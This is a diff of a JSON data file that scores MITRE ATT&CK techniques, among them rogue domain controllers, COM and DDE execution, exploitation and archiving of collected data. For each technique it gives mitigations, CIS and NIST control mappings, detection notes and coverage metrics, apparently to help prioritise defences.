+                        "mid": "M1048",
+                        "name": "Application Isolation and Sandboxing",
+                        "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                        "url": "https://attack.mitre.org/mitigations/M1048"
+                    },
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
                     }
                 ]
             }
         ],
         "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
             {
                 "mid": "M1042",
                 "name": "Disable or Remove Feature or Program",
@@ -9149,109 +32136,150 @@
                 "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             }
         ],
-        "cumulative_score": 0.22380952380952382,
-        "adjusted_score": 0.22380952380952382,
+        "cumulative_score": 0.5918016861904762,
+        "adjusted_score": 0.5918016861904762,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [
-            "4.2",
-            "4.4",
-            "7.7",
-            "13.4"
+            "2.5",
+            "2.6",
+            "4.1",
+            "4.8",
+            "13.7",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
+            "AC-2",
             "AC-3",
             "AC-4",
-            "CA-7",
+            "AC-5",
+            "AC-6",
+            "CM-10",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SC-18",
+            "SC-3",
             "SC-7",
-            "SI-15",
+            "SI-2",
+            "SI-3",
             "SI-4"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.12380952380952381,
-            "mitigation_score": 0.23636363636363636
+            "combined_score": 0.2761904761904762,
+            "mitigation_score": 0.4727272727272727,
+            "detection_score": 0.06
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.01561121
     },
     {
-        "tid": "T1207",
-        "name": "Rogue Domain Controller",
-        "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)",
-        "url": "https://attack.mitre.org/techniques/T1207",
+        "tid": "T1559.001",
+        "name": "Inter-Process Communication: Component Object Model",
+        "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
+        "url": "https://attack.mitre.org/techniques/T1559/001",
         "tactics": [
-            "Defense Evasion"
+            "Execution"
         ],
-        "detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.",
+        "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
         "platforms": [
             "Windows"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Object Creation",
-            "Active Directory: Active Directory Object Modification",
-            "Network Traffic: Network Traffic Content",
-            "User Account: User Account Authentication"
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1559",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.10476190476190476,
-        "adjusted_score": 0.10476190476190476,
-        "has_car": false,
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.24285714285714285,
+        "adjusted_score": 0.24285714285714285,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": true,
+        "cis_controls": [
+            "4.1"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SC-18",
+            "SC-3",
+            "SC-7",
+            "SI-3"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0047619047619047615,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1210",
-        "name": "Exploitation of Remote Services",
-        "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",
-        "url": "https://attack.mitre.org/techniques/T1210",
+        "tid": "T1559.002",
+        "name": "Inter-Process Communication: Dynamic Data Exchange",
+        "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)",
+        "url": "https://attack.mitre.org/techniques/T1559/002",
         "tactics": [
-            "Lateral Movement"
+            "Execution"
         ],
-        "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+        "detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\n\nOLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Network Traffic: Network Traffic Content"
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1559",
         "subtechniques": [],
         "mitigations": [
             {
@@ -9260,6 +32288,12 @@
                 "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
                 "url": "https://attack.mitre.org/mitigations/M1048"
             },
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
             {
                 "mid": "M1042",
                 "name": "Disable or Remove Feature or Program",
@@ -9267,209 +32301,132 @@
                 "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1019",
-                "name": "Threat Intelligence Program",
-                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
-                "url": "https://attack.mitre.org/mitigations/M1019"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
-            },
-            {
-                "mid": "M1016",
-                "name": "Vulnerability Scanning",
-                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
-                "url": "https://attack.mitre.org/mitigations/M1016"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             }
         ],
-        "cumulative_score": 0.730952380952381,
-        "adjusted_score": 0.730952380952381,
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.3",
             "2.5",
-            "3.12",
+            "2.6",
             "4.1",
-            "4.4",
-            "4.7",
             "4.8",
-            "5.3",
-            "5.5",
-            "6.1",
-            "6.2",
-            "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "7.6",
-            "10.5",
-            "12.2",
-            "12.8",
-            "16.13",
-            "16.8",
-            "18.1",
-            "18.2",
+            "13.7",
             "18.3",
-            "18.5",
-            "16.10"
+            "18.5"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
             "AC-4",
-            "AC-5",
             "AC-6",
-            "CA-2",
-            "CA-7",
-            "CA-8",
+            "CM-10",
             "CM-2",
-            "CM-5",
             "CM-6",
             "CM-7",
             "CM-8",
-            "IA-2",
-            "IA-8",
-            "RA-10",
             "RA-5",
             "SC-18",
-            "SC-2",
-            "SC-26",
-            "SC-29",
             "SC-3",
-            "SC-30",
-            "SC-35",
-            "SC-39",
-            "SC-46",
             "SC-7",
             "SI-2",
             "SI-3",
-            "SI-4",
-            "SI-5",
-            "SI-7"
+            "SI-4"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": true,
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.580952380952381,
-            "mitigation_score": 1,
-            "detection_score": 0.12
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1211",
-        "name": "Exploitation for Defense Evasion",
-        "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.",
-        "url": "https://attack.mitre.org/techniques/T1211",
+        "tid": "T1560",
+        "name": "Archive Collected Data",
+        "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
+        "url": "https://attack.mitre.org/techniques/T1560",
         "tactics": [
-            "Defense Evasion"
+            "Collection"
         ],
-        "detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.",
+        "detection": "Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
-        "data_sources": [],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [
+        "subtechniques": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
+                "tid": "T1560.001",
+                "name": "Archive Collected Data: Archive via Utility",
+                "url": "https://attack.mitre.org/techniques/T1560/001",
+                "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\n\nSome 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.",
+                "detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    }
+                ]
             },
             {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
+                "tid": "T1560.002",
+                "name": "Archive Collected Data: Archive via Library",
+                "url": "https://attack.mitre.org/techniques/T1560/002",
+                "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.",
+                "detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
+                "mitigations": []
             },
             {
-                "mid": "M1019",
-                "name": "Threat Intelligence Program",
-                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
-                "url": "https://attack.mitre.org/mitigations/M1019"
-            },
+                "tid": "T1560.003",
+                "name": "Archive Collected Data: Archive via Custom Method",
+                "url": "https://attack.mitre.org/techniques/T1560/003",
+                "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
+                "detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [
             {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             }
         ],
-        "cumulative_score": 0.4417428242857143,
-        "adjusted_score": 0.4417428242857143,
-        "has_car": false,
+        "cumulative_score": 0.6845022647619048,
+        "adjusted_score": 0.6845022647619048,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "10.5",
+            "2.1",
+            "2.2",
+            "2.3",
+            "2.4",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
-            "AC-4",
-            "AC-6",
-            "CA-7",
             "CA-8",
-            "CM-2",
-            "CM-6",
-            "CM-8",
-            "RA-10",
             "RA-5",
-            "SC-18",
-            "SC-2",
-            "SC-26",
-            "SC-29",
-            "SC-3",
-            "SC-30",
-            "SC-35",
-            "SC-39",
             "SC-7",
-            "SI-2",
             "SI-3",
-            "SI-4",
-            "SI-5",
-            "SI-7"
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
@@ -9477,371 +32434,297 @@
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.3142857142857143,
-            "mitigation_score": 0.5636363636363636,
-            "detection_score": 0.04
+            "combined_score": 0.20476190476190476,
+            "mitigation_score": 0.2,
+            "detection_score": 0.21
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0.02745711
+        "prevalence_score": 0.37974036
     },
     {
-        "tid": "T1212",
-        "name": "Exploitation for Credential Access",
-        "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.",
-        "url": "https://attack.mitre.org/techniques/T1212",
+        "tid": "T1560.001",
+        "name": "Archive Collected Data: Archive via Utility",
+        "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\n\nSome 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.",
+        "url": "https://attack.mitre.org/techniques/T1560/001",
         "tactics": [
-            "Credential Access"
+            "Collection"
         ],
-        "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.",
+        "detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
-        "data_sources": [],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1560",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
-            },
-            {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
-            },
-            {
-                "mid": "M1019",
-                "name": "Threat Intelligence Program",
-                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
-                "url": "https://attack.mitre.org/mitigations/M1019"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             }
         ],
-        "cumulative_score": 0.4571428571428572,
-        "adjusted_score": 0.4571428571428572,
+        "cumulative_score": 0.20476190476190478,
+        "adjusted_score": 0.20476190476190478,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "10.5",
+            "2.1",
+            "2.2",
+            "2.3",
+            "2.4",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-4",
-            "AC-6",
-            "CA-7",
             "CA-8",
-            "CM-2",
-            "CM-6",
-            "CM-8",
-            "RA-10",
             "RA-5",
-            "SC-18",
-            "SC-2",
-            "SC-26",
-            "SC-29",
-            "SC-3",
-            "SC-30",
-            "SC-35",
-            "SC-39",
             "SC-7",
-            "SI-2",
             "SI-3",
-            "SI-4",
-            "SI-5",
-            "SI-7"
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1560.002",
+        "name": "Archive Collected Data: Archive via Library",
